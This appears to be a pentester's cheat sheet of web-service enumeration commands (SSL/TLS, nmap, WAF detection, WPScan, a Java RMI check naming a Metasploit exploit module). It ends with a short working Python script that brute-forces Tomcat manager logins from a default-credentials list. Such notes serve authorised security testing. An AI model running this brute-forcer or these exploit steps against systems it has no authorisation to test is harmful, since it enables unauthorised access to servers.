Web

SSL/TLS

openssl s_client -connect <ip>:443
testssl.sh <ip>

Nmap

cd /usr/share/nmap/scripts;ls | grep http
nmap --open --script=host* -p <port> <ip>

WAF

nmap -p 80,443 --script=http-waf-detect <ip>
nmap -p 80,443 --script=http-waf-fingerprint <ip>
wafw00f <url>

WPscan

wpscan -u <url/ip>

Java RMI (not tested)

nmap --script=rmi-vuln-classloader -p 1099 <ip>
https://svn.nmap.org/nmap/scripts/rmi-vuln-classloader.nse
msf>exploit/multi/misc/java_rmi_server

Tomcat bruteforce

./tomcat_brute.py </opt/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt> <ip> <port>
#!/usr/bin/python3
import sys
import requests
with open(sys.argv[1]) as f:
        for line in f:
                c = line.strip('\n').split(":")
                r = requests.get('http://'+sys.argv[2]+':'+sys.argv[3]+'/manager/html', auth=(c[0], c[1]))

                if r.status_code == 200:
                        print("Found valid credentials \"" + line.strip('\n') + "\"")
                        raise sys.exit()